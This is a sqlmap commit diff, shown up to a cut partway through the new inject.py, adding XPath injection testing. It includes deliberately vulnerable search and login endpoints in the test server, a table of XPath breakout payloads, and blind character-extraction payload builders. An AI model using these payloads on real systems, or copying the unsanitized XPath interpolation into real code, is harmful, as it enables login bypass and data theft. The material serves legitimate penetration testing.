Adding switch --xpath

This commit is contained in:
Miroslav Štampar 2026-06-29 00:29:27 +02:00
parent 4c869817d4
commit 8ff5d3811a
12 changed files with 1242 additions and 9 deletions

View file

@ -108,7 +108,9 @@ jobs:
python -m coverage report --fail-under=50
- name: Smoke test
run: python sqlmap.py --smoke-test
run: |
python -m pip install -q lxml
python sqlmap.py --smoke-test
- name: Vuln test
run: python sqlmap.py --vuln-test

View file

@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/
df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh
1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py
32577fc21a6170266438b608ed81620e0b0a889aa8a05124bc7f0905cba772a6 extra/vulnserver/vulnserver.py
a4d4ec8aaea6da7b20068209945cf46348bde74b4c90ddf630c3be820d16f73e extra/vulnserver/vulnserver.py
a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py
c9a1661fc6719655e1e5b6dd72caab680766690c5f746b386093267329f7b3b8 lib/controller/checks.py
256ba0c6967121dc25c95fe09d1165dd8d0530f26c7879e6036f649fb0a6de95 lib/controller/controller.py
0397a941e27fa23ef375b6bd0a654132b05496d78737253a58524aab7e840789 lib/controller/checks.py
e9fd898a38e4e1bfc975e44b41b344c190e58d845b8602a50a2bf05835ddc7c8 lib/controller/controller.py
d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py
9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py
@ -181,7 +181,7 @@ f8de57606325456928e46ae2896f5f8bbec9ad18b1c644b492a566fa992216f6 lib/core/decor
5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
1b03686e1aa916ccad3cd86b8e4e6ea4baca5e30e05bf86a56f8df8dd4f44ba6 lib/core/optiondict.py
8b5d4d1f503ef7075820f7eca184c9e55386b7717c5cf93d195fa9e5332d9e34 lib/core/optiondict.py
e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/option.py
21b2b1745107c211fc7593923a3da7a808d40763c00091c28de5f7c129bcf3bc lib/core/patch.py
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
@ -189,18 +189,18 @@ e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/optio
9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
e9aae7dacf83a4d7054862eeb0a96ed695731cd87f8b03836a8a41c7454d0f5f lib/core/settings.py
77a4804887ae9dde7142ede91fcae1bd1d7369132f90d7bf095e8bad6f62e5a4 lib/core/settings.py
c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py
a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py
19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py
46b405d0e0e035b3f323deffc1f1d30505adf7c01144ea2ddf81c5dc6caaa20f lib/core/testing.py
fbfb3fa79ac0566a985b8cdc3a2e4758bdf4ccf9d94428163bfe6432c72d696b lib/core/testing.py
95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py
b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py
53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py
2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py
54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py
8351588876a7579fa96b3ab860ef2254487de34ea624c0a7696f2428c24ceb98 lib/parse/cmdline.py
541b517c9cacba2b62122c1dc2be8f2808afdc32e715983edf29998433b531bb lib/parse/cmdline.py
02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py
c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py
5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py
@ -249,6 +249,8 @@ e2cd2b19f82393f9bbc8f374686cd851a4ccc264bb898ea54547ec479a05674c lib/techniques
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py
ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py
c65766f71e285fc85cdf58e7448c4c1d015af2a9dbb44fa3b665a9f13362fbcc lib/techniques/union/use.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/xpath/__init__.py
ece1fca81148ccf3c5f13b6ad7fb64966cb1ebef245216eac5cb0dd2490989db lib/techniques/xpath/inject.py
aeefb42ea0c68f72744bc1bfd7194ec1bc06480d8a7e23f4b8d3d23fbba2b014 lib/utils/api.py
442555ab85277aff7c9e0cf465ea5b0d28395c326f68363449b2d3941f4b6de2 lib/utils/brute.py
da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py
@ -654,6 +656,7 @@ eca021208e388b4d14c53f1e9f8a6e7d685e54ba572fb2a8487e6b620a20bcb5 tests/test_use
2364db35025a53ea4e5a0a80c034997642785f7e6d1566d0d0f1db959fe3c82e tests/test_utils.py
93ef9944effc62d4f744c57bd643137c90fd92205c6a6cbe891e0e99efb80a7f tests/test_wafbypass.py
81bb6d7449f224fa337734ae361c1a340bf9a51768a854d6a1a6e718ed1263ca tests/test_wordlist.py
c7584cad4f99416e6415744412941f5a47b2f5284270326624bd291edf6d9994 tests/test_xpath.py
55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py
f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7 thirdparty/beautifulsoup/beautifulsoup.py

View file

@ -217,6 +217,84 @@ def nosql_match(params):
else: # $eq, $in (single-valued here) and any literal equality
return record == value
# --- XPath endpoint (vulnerable search and login, backed by an in-memory XML document) ------------
XPATH_XML = """<?xml version="1.0" encoding="UTF-8"?>
<directory>
<department name="IT Operations">
<user id="1">
<username>luther</username>
<realname>Luther Blisset</realname>
<email>luther@example.com</email>
<password>db3a16990a0008a3b04707fdef6584a0</password>
<role>System Administrator</role>
<location>London</location>
<phone>+1 555 0100</phone>
</user>
<user id="2">
<username>fluffy</username>
<realname>Fluffy Bunny</realname>
<email>fluffy@example.com</email>
<password>4db967ce67b15e7fb84c266a76684729</password>
<role>Security Engineer</role>
<location>Amsterdam</location>
<phone>+1 555 0102</phone>
</user>
<user id="3">
<username>wu</username>
<realname>Wu Ming</realname>
<email>wu@example.com</email>
<password>f5a2950eaa10f9e99896800eacbe8275</password>
<role>Network Administrator</role>
<location>Shanghai</location>
<phone>+86 21 555 0103</phone>
</user>
</department>
<department name="Engineering">
<user id="4">
<username>linus</username>
<realname>Linus Torvalds</realname>
<email>linus@example.com</email>
<password>8e7b6a5c4d321908f7e6d5c4b3a2910f</password>
<role>Kernel Developer</role>
<location>Portland</location>
<phone>+1 555 0200</phone>
</user>
<user id="5">
<username>ada</username>
<realname>Ada Lovelace</realname>
<email>ada@example.com</email>
<password>1a2b3c4d5e6f7081920a1b2c3d4e5f60</password>
<role>Algorithm Designer</role>
<location>London</location>
<phone>+44 20 555 0201</phone>
</user>
</department>
<department name="Management">
<user id="6">
<username>grace</username>
<realname>Grace Hopper</realname>
<email>grace@example.com</email>
<password>9e8d7c6b5a493827160e9d8c7b6a5948</password>
<role>CTO</role>
<location>New York</location>
<phone>+1 555 0300</phone>
</user>
</department>
</directory>"""
def _xpath_element_to_dict(el):
"""Convert an lxml element to a dict for JSON serialization."""
retVal = dict(el.attrib)
retVal["tag"] = el.tag
retVal["text"] = (el.text or "").strip()
children = []
for child in el:
children.append(_xpath_element_to_dict(child))
if children:
retVal["children"] = children
return retVal
_conn = None
_cursor = None
_lock = None
@ -889,6 +967,58 @@ class ReqHandler(BaseHTTPRequestHandler):
self.wfile.write(output.encode(UNICODE_ENCODING))
return
if self.url == "/xpath/search":
self.send_response(OK)
self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING)
self.send_header("Connection", "close")
self.end_headers()
q = self.params.get("q", "")
entries = []
error = None
if q:
try:
from lxml import etree
root = etree.fromstring(XPATH_XML.encode("utf-8"))
# VULNERABLE: unsanitized user input directly interpolated into XPath
xpath_expr = "/directory/department/user[contains(username,'%s') or contains(realname,'%s')]" % (q, q)
elements = root.xpath(xpath_expr)
entries = [_xpath_element_to_dict(el) for el in elements]
except Exception as ex:
error = "%s: %s" % (type(ex).__name__, getUnicode(ex))
output = json.dumps({"entries": entries, "count": len(entries), "error": error}, default=str)
self.wfile.write(output.encode(UNICODE_ENCODING))
return
if self.url == "/xpath/login":
self.send_response(OK)
self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING)
self.send_header("Connection", "close")
self.end_headers()
username = self.params.get("username", "")
password = self.params.get("password", "")
error = None
authenticated = False
if username and password:
try:
from lxml import etree
root = etree.fromstring(XPATH_XML.encode("utf-8"))
# VULNERABLE: unsanitized interpolation into XPath login expression
xpath_expr = "/directory/department/user[username='%s' and password='%s']" % (username, password)
results = root.xpath(xpath_expr)
if results:
authenticated = True
except Exception as ex:
error = "%s: %s" % (type(ex).__name__, getUnicode(ex))
output = json.dumps({"authenticated": authenticated, "error": error}, default=str)
self.wfile.write(output.encode(UNICODE_ENCODING))
return
if self.url == '/':
if not any(_ in self.params for _ in ("id", "query")):
self.send_response(OK)

View file

@ -83,6 +83,7 @@ from lib.core.settings import GRAPHQL_ERROR_REGEX
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import LDAP_ERROR_REGEX
from lib.core.settings import XPATH_ERROR_REGEX
from lib.core.settings import IPS_WAF_CHECK_PAYLOAD
from lib.core.settings import IPS_WAF_CHECK_RATIO
from lib.core.settings import IPS_WAF_CHECK_TIMEOUT
@ -1194,6 +1195,13 @@ def heuristicCheckSqlInjection(place, parameter):
if conf.beep:
beep()
if not conf.xpath and re.search(XPATH_ERROR_REGEX, page or ""):
infoMsg = "heuristic (XPath) test shows that %sparameter '%s' might be vulnerable to XPath injection (rerun with switch '--xpath')" % ("%s " % paramType if paramType != parameter else "", parameter)
logger.info(infoMsg)
if conf.beep:
beep()
kb.disableHtmlDecoding = False
kb.heuristicMode = False

View file

@ -543,6 +543,11 @@ def start():
ldapScan()
continue
if conf.xpath:
from lib.techniques.xpath.inject import xpathScan
xpathScan()
continue
if conf.nullConnection:
checkNullConnection()

View file

@ -120,6 +120,8 @@ optDict = {
"technique": "string",
"nosql": "boolean",
"graphql": "boolean",
"ldap": "boolean",
"xpath": "boolean",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.6.188"
VERSION = "1.10.6.189"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -977,6 +977,44 @@ LDAP_FINGERPRINT_ATTRIBUTES = (
("vendorName", "Red Hat", "389 Directory Server"),
)
# XPath error signatures per parser implementation for error-based detection and
# fingerprinting (matched against HTTP response bodies). Each tuple is
# (backend_name, regex_fragment).
# NOTE: a backend may span several rows and some fragments overlap between backends
# (e.g. "xmlXPathEval" and "Invalid expression" appear under both lxml/libxml2 and PHP),
# so any consumer that stops at the first matching row attributes such hits to the
# earlier entry -- row order is significant
XPATH_ERROR_SIGNATURES = (
("Java JAXP / Xalan", r"(?:javax\.xml\.(?:xpath\.XPathExpressionException|transform\.Transformer(?:Configuration)?Exception)|com\.sun\.org\.apache\.xpath\.(?:XPathException|XPathProcessorException)|org\.apache\.xpath|org\.xml\.sax\.SAX(?:Parse)?Exception)"),
("Java JAXP / Xalan", r"XPath (?:expression|syntax) error"),
("Java JAXP / Saxon", r"net\.sf\.saxon\.(?:trans\.XPathException|s9api\.SaxonApiException)"),
("Java JAXP / Saxon", r"(?:XPST|XPTY|XPDY|XQST|XTDE)\d{4}:"),
(".NET XPathNavigator", r"System\.Xml\.(?:XPath\.XPathException|XmlException)"),
(".NET XPathNavigator", r"Expression must evaluate to a node-set"),
(".NET XPathNavigator", r"has an invalid (?:token|qualified name)"),
("lxml / libxml2", r"(?:lxml\.etree\.(?:XPath(?:Eval|Document|Syntax)?Error)|libxml2|xmlXPath(?:CompOp|Eval|Err))"),
("lxml / libxml2", r"(?:XPath error|Invalid (?:expression|predicate))"),
("PHP SimpleXML / DOMXPath", r"(?:SimpleXMLElement::xpath\(\)|DOMXPath::(?:query|evaluate)\(\))"),
("PHP SimpleXML / DOMXPath", r"Invalid expression|xmlXPathEval"),
("Saxon (standalone)", r"(?:net\.sf\.saxon\.(?:s9api\.SaxonApiException|trans\.XPathException)|Saxon error)"),
("Saxon (standalone)", r"Static error\(s\) in query"),
("BaseX", r"org\.basex\.(?:query\.QueryException|core\.BaseXException)"),
("BaseX", r"\[(?:XPST|XPTY|XPDY)\d{4}\]"),
("eXist", r"org\.exist\.xquery\.(?:XPathException|XQueryException)"),
("eXist", r"exerr:ERROR"),
("Python ElementTree", r"xml\.etree\.ElementTree\.(?:ParseError|Element)"),
("Generic XPath", r"(?:XPath|XSLT).*?(?:error|exception|syntax)"),
("Generic XPath", r"Invalid XPath|XPath evaluation failed"),
)
# Single case-insensitive alternation of every fragment above, for a quick
# "does this page contain any XPath error" check (the individual fragments carry
# no inline flags, so they are case-sensitive when searched on their own)
XPATH_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in XPATH_ERROR_SIGNATURES)
# Printable-ASCII codepoint bounds bisected during XPath blind character extraction
XPATH_CHAR_MIN = 0x20
XPATH_CHAR_MAX = 0x7e
# Maximum tree depth for recursive XML walking during XPath blind extraction
XPATH_MAX_DEPTH = 32
# Upper bound for the value-length search during XPath blind extraction
XPATH_MAX_LENGTH = 256
# Length of prefix and suffix used in non-SQLI heuristic checks
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6

View file

@ -91,6 +91,7 @@ def vulnTest():
("-u \"<base>nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction
("-u \"<base>graphql\" --graphql --flush-session --disable-hashing", ("found GraphQL endpoint", "introspection returned", "skipping 2 mutation slot", "GraphQL boolean-based blind", "in-band data exposure", "back-end DBMS: 'SQLite'", "banner: '3.", "GraphQL database tables", "fetched 30 entries from table 'creds'", "db3a16990a0008a3b04707fdef6584a0", "GraphQL scan complete")), # GraphQL: endpoint detection + introspection + mutation-skip + boolean-blind/in-band + back-end fingerprint + batched blind dump of an injection-only table (SQLite-backed)
("-u \"<base>ldap/search?q=x\" --ldap --flush-session --disable-hashing", ("is vulnerable to LDAP injection", "Title: LDAP in-band data exposure", "LDAP: GET parameter 'q' in-band entries", "in-band data exposure", "LDAP scan complete")), # LDAP: error-based detection (unbalanced paren) + boolean oracle + directory attribute extraction via blind substring probing
("-u \"<base>xpath/search?q=x\" --xpath --flush-session --disable-hashing", ("is vulnerable to XPath injection", "Title: XPath boolean-based blind", "XPath: GET parameter 'q' XML tree", "extracted", "XPath scan complete")), # XPath: error-based detection + boolean oracle + blind XML tree-walking via starts-with character extraction
("-u \"<url>&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
("-d \"<direct>\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")),
("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)),

View file

@ -424,6 +424,9 @@ def cmdLineParser(argv=None):
techniques.add_argument("--ldap", dest="ldap", action="store_true",
help="Test for LDAP injection (filter breakout, boolean blind, auth bypass)")
techniques.add_argument("--xpath", dest="xpath", action="store_true",
help="Test for XPath injection (error-based, boolean-blind, blind XML tree-walking)")
techniques.add_argument("--time-sec", dest="timeSec", type=int,
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)

View file

@ -0,0 +1,8 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
pass

View file

@ -0,0 +1,626 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import difflib
import re
import time
from collections import namedtuple
from lib.core.common import beep
from lib.core.common import randomStr
from lib.core.convert import getUnicode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import PLACE
from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.settings import XPATH_CHAR_MAX
from lib.core.settings import XPATH_CHAR_MIN
from lib.core.settings import XPATH_ERROR_REGEX
from lib.core.settings import XPATH_ERROR_SIGNATURES
from lib.core.settings import XPATH_MAX_DEPTH
from lib.core.settings import XPATH_MAX_LENGTH
from lib.request.connect import Connect as Request
from lib.utils.xrange import xrange
# Random lowercase marker value; regenerated at the start of every xpathScan() run
# and sent as a parameter value when a "false" reference page is needed
SENTINEL = randomStr(length=10, lowercase=True)
# Request places whose parameters are considered for XPath injection testing
XPATH_PLACES = (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST)
# Each detection breakout is paired with a false variant and an (optional) extraction
# boundary. The boundary carries a prefix/suffix pair that wraps the extraction
# predicate so the surrounding template stays syntactically valid.
#
# Breakouts are listed in detection-priority order: function-argument closers first,
# then simple string, double-quoted, union wildcard, and bare numeric/boolean.
# The first row whose true/false pair yields a reproducible difference wins.
_BREAKOUT_TABLE = (
# (breakout, false_variant, extraction_prefix, extraction_suffix )
# -- function-argument (closes paren + string) ------------------------------------------------------------
("') or true() or ('", "') and false() and ('", "') or ", " or ('"),
("') or '1'='1' or ('", "') and '1'='2' and ('", "') or ", " or ('"),
("') or 1=1 or ('", "') and 1=2 and ('", "') or ", " or ('"),
# -- single-quoted string (suffix absorbs trailing quote; predicate decisive when original value unmatched)
("' or '1'='1", "' and '1'='2", "' or ", " and '1'='1"),
("' or true() or '", "' and false() and '", "' or ", " and '1'='1"),
("' or 1=1 or '", "' and 1=2 and '", "' or ", " and '1'='1"),
# -- AND context (single-quoted) -------------------------------------------------------------------------
("' and '1'='1", "' and '1'='2", "' and ", " and '1'='1"),
# -- double-quoted string (suffix absorbs trailing quote) -------------------------------------------------
('" or "1"="1', '" and "1"="2', '" or ', ' and "1"="1'),
('" or true() or "', '" and false() and "', '" or ', ' and "1"="1'),
# -- double-quoted function-argument ---------------------------------------------------------------------
('") or true() or ("', '") and false() and ("', '") or ', ' or ("'),
# -- union wildcard (detection-only, no extraction; it has no false variant, so the
#    boolean detection loop skips this row) ------------------------------------------------------------
("']|//*|test['", None, None, None),
# -- numeric / bare context (extraction uses 'and'; requires original value to not match anything) ----------
(" or 1=1", " and 1=2", " and ", ""),
(" or true()", " and false()", " and ", ""),
)
# Boundary: the prefix/suffix pair wrapped around an extraction predicate for a
# verified injection point, plus a flag telling whether it can drive tree-walking
Boundary = namedtuple("Boundary", ("prefix", "suffix", "extractable"))

# Lookups derived from _BREAKOUT_TABLE:
#   _BREAKOUT_LIST      - breakouts in table (detection-priority) order
#   _BREAKOUT_FALSE_MAP - breakout -> its false variant (None when the row has none)
#   _BREAKOUT_BOUNDARY  - breakout -> extractable Boundary (None for detection-only rows)
_BREAKOUT_FALSE_MAP = {}
_BREAKOUT_BOUNDARY = {}
_BREAKOUT_LIST = []

for _entry in _BREAKOUT_TABLE:
    _bk, _fv, _pfx, _sfx = _entry
    _BREAKOUT_LIST.append(_bk)
    _BREAKOUT_FALSE_MAP[_bk] = _fv
    _BREAKOUT_BOUNDARY[_bk] = Boundary(_pfx, _sfx, True) if _pfx is not None else None

XPATH_BREAKOUT_PREFIXES = tuple(_BREAKOUT_LIST)

# Slot: record describing one tested injection point; every field defaults to None
Slot = namedtuple("Slot", ("place", "parameter", "backend", "oracle", "template", "payload", "boundary"))
Slot.__new__.__defaults__ = (None,) * len(Slot._fields)
def _ratio(first, second):
return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio()
def _delim(place):
    """Return the delimiter separating parameters in the given place:
    the configured cookie delimiter (default ';') for cookies, '&' otherwise."""
    if place == PLACE.COOKIE:
        return conf.cookieDel or ';'
    return '&'
def _confParameters(place):
    """Return the raw parameter string stored for `place` ("" when absent).

    Falls back to plain membership/indexing when the parameters container
    does not provide a .get() method."""
    try:
        retVal = conf.parameters.get(place, "")
    except AttributeError:
        if place in conf.parameters:
            retVal = conf.parameters[place]
        else:
            retVal = ""
    return retVal
def _originalValue(place, parameter):
    """Return the current value of `parameter` in `place`.

    The raw parameter string is scanned first (first matching name wins); when
    the name is not found there, the parsed parameter dictionary is consulted.
    Returns "" if the parameter has no (or an empty) value."""
    pairs = (_.partition('=') for _ in _confParameters(place).split(_delim(place)))
    for name, _, value in pairs:
        if name.strip() == parameter:
            return value

    parsed = conf.paramDict.get(place, {})
    return parsed.get(parameter) or ""
def _replaceSegment(place, parameter, value):
    """Return the parameter string of `place` with `parameter` set to `value`.

    Only the first segment whose (stripped) name equals `parameter` is replaced;
    all other segments are kept verbatim. If no segment matches, the string is
    rebuilt from the parsed parameter dictionary instead."""
    delimiter = _delim(place)
    segments = _confParameters(place).split(delimiter)

    replaced = False
    for index, segment in enumerate(segments):
        name = segment.partition('=')[0]
        if name.strip() == parameter:
            segments[index] = "%s=%s" % (name, value)
            replaced = True
            break

    if not replaced:
        segments = []
        for name, oldValue in conf.paramDict.get(place, {}).items():
            newValue = value if name == parameter else oldValue
            segments.append("%s=%s" % (name, newValue))

    return delimiter.join(segments)
def _send(place, parameter, value):
    """Send one HTTP request with `parameter` (in `place`) set to `value`.

    conf.parameters[place] is swapped for the duration of the request and always
    restored afterwards, so the regular request machinery builds the request.
    Honors conf.delay. Returns the response page, or "" when the page is empty
    or the request raised an exception (which is logged at debug level)."""
    if conf.delay:
        time.sleep(conf.delay)

    backup = conf.parameters.get(place, "")
    conf.parameters[place] = _replaceSegment(place, parameter, value)

    try:
        if conf.verbose >= 3:
            logger.log(CUSTOM_LOGGING.PAYLOAD, "%s=%s" % (parameter, value))

        page, _headers, _code = Request.getPage(raise404=False, silent=True)
        return page or ""
    except Exception as ex:
        logger.debug("XPath probe request failed: %s" % getUnicode(ex))
        return ""
    finally:
        # restore the untouched parameter string regardless of the outcome
        conf.parameters[place] = backup
def _isError(page):
    """Return True when `page` contains any known XPath error signature."""
    content = getUnicode(page or "")
    return re.search(XPATH_ERROR_REGEX, content) is not None
def _backendFromError(page):
    """Return the backend name of the first error signature found in `page`.

    Signatures are tried in table order. When none of them matches on its own but
    the combined (case-insensitive) error regex does, "Generic XPath" is returned;
    otherwise None."""
    content = getUnicode(page or "")

    matched = next((backend for backend, regex in XPATH_ERROR_SIGNATURES if re.search(regex, content)), None)
    if matched is not None:
        return matched

    if _isError(content):
        return "Generic XPath"
    return None
def _probeBackendByParserError(place, parameter):
    """Probe for XPath parser errors to obtain a backend hint.

    The original value (or "x" when empty) is sent as a baseline, then once more
    with each syntax-breaking suffix appended. A probe counts only if its page
    differs from the baseline and carries a recognizable XPath error.

    Returns (backend, payload) for the first such probe, or (None, None).
    This is NOT authoritative detection -- only a boolean oracle confirms injection."""
    original = _originalValue(place, parameter) or "x"
    normal = _send(place, parameter, original)

    # No probe can be accepted without a usable, error-free baseline, so bail out
    # before sending any of the breaking requests
    if not normal or _isError(normal):
        return None, None

    for suffix in ("'", '"', "')", '")', "]", "|"):
        payload = original + suffix
        broken = _send(place, parameter, payload)

        # a page (nearly) identical to the baseline means the suffix broke nothing
        if _ratio(normal, broken) >= UPPER_RATIO_BOUND:
            continue

        backend = _backendFromError(broken)
        if backend:
            return backend, payload

    return None, None
def _boolean(truthy, falsy):
    """Return the true page when the true/false probes reproducibly diverge, else None.

    Each probe is issued twice: its first page must be error-free and the second
    one must be similar to it. The true page is returned only if it is then
    dissimilar to the false page."""

    def reproducible(probe):
        # first page of a probe that is error-free and stable across two requests
        first = probe()
        if first is None or _isError(first):
            return None
        if _ratio(first, probe()) < UPPER_RATIO_BOUND:
            return None
        return first

    truePage = reproducible(truthy)
    if truePage is None:
        return None

    falsePage = reproducible(falsy)
    if falsePage is None:
        return None

    diverges = _ratio(truePage, falsePage) < UPPER_RATIO_BOUND
    return truePage if diverges else None
def _makePayload(original, boundary, predicate):
"""Construct a payload by inserting `predicate` into the verified boundary."""
if boundary.suffix:
return "%s%s%s%s" % (original, boundary.prefix, predicate, boundary.suffix)
return "%s%s%s" % (original, boundary.prefix, predicate)
def _detectBoolean(place, parameter):
    """Return (template, payload, boundary) for boolean-blind XPath injection.

    Breakouts are tried in priority order; rows without a false variant are
    skipped. If none works and the parameter has an original value, a wildcard
    probe ("*" against a random sentinel) is tried, for which boundary is None.
    Returns (None, None, None) when no reproducible difference is found."""
    original = _originalValue(place, parameter) or ""

    def probe(value):
        # deferred request, so that _boolean() can replay it
        return lambda: _send(place, parameter, value)

    for breakout in XPATH_BREAKOUT_PREFIXES:
        falseVariant = _BREAKOUT_FALSE_MAP.get(breakout)
        if falseVariant:
            truePayload = original + breakout
            template = _boolean(probe(truePayload), probe(original + falseVariant))
            if template:
                return template, truePayload, _BREAKOUT_BOUNDARY.get(breakout)

    # Wildcard: only useful for bool differentiation, not enumeration
    if original:
        template = _boolean(probe("*"), probe(SENTINEL))
        if template:
            return template, "*", None

    return None, None, None
def _isPasswordParam(parameter):
    """Return True when the (lower-cased) parameter name contains a
    credential-related keyword."""
    lowered = getUnicode(parameter or "").lower()
    for keyword in ("pass", "pwd", "secret", "pin", "cred", "key", "token", "auth"):
        if keyword in lowered:
            return True
    return False
def _fingerprintByError(backend):
    """Map a backend hint to the first known signature name contained in it.

    Returns None for an empty hint and the hint itself when no known name matches."""
    if backend:
        return next((name for name, _ in XPATH_ERROR_SIGNATURES if name in backend), backend)
    return None
def _xpathQuote(s):
    """Return `s` as an XPath string literal.

    The value is wrapped in whichever quote character (single first, then double)
    it does not contain. If it contains both, a concat() expression is produced
    with double-quoted pieces joined by a literal double quote."""
    s = getUnicode(s)

    for quote in ("'", '"'):
        if quote not in s:
            return "%s%s%s" % (quote, s, quote)

    # both quote types present: use concat() with " as outer delimiter
    pieces = ['"%s"' % _ for _ in s.split('"')]
    return "concat(%s)" % ", '\"', ".join(pieces)
class _XPathPayloadBuilder(object):
    """Factory of complete boolean payloads for blind XML tree-walking.

    Every public method formats one XPath predicate and wraps it with the
    original parameter value and the injection boundary verified at detection."""

    def __init__(self, original, boundary):
        self.boundary = boundary
        # an empty original value is replaced by the placeholder "x"
        self.original = original if original else "x"

    def _make(self, predicate):
        return _makePayload(self.original, self.boundary, predicate)

    def nameStartsWith(self, path, prefix):
        predicate = "starts-with(name(%s),%s)" % (path, _xpathQuote(prefix))
        return self._make(predicate)

    def nameLength(self, path, length):
        predicate = "string-length(name(%s))=%d" % (path, length)
        return self._make(predicate)

    def childCount(self, path, count):
        predicate = "count(%s/*)>=%d" % (path, count)
        return self._make(predicate)

    def attributeCount(self, path, count):
        predicate = "count(%s/@*)>=%d" % (path, count)
        return self._make(predicate)

    def attributeNameStartsWith(self, path, index, prefix):
        predicate = "starts-with(name(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix))
        return self._make(predicate)

    def attributeValueStartsWith(self, path, index, prefix):
        predicate = "starts-with(string(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix))
        return self._make(predicate)

    def textStartsWith(self, path, prefix):
        predicate = "starts-with(string(%s),%s)" % (path, _xpathQuote(prefix))
        return self._make(predicate)
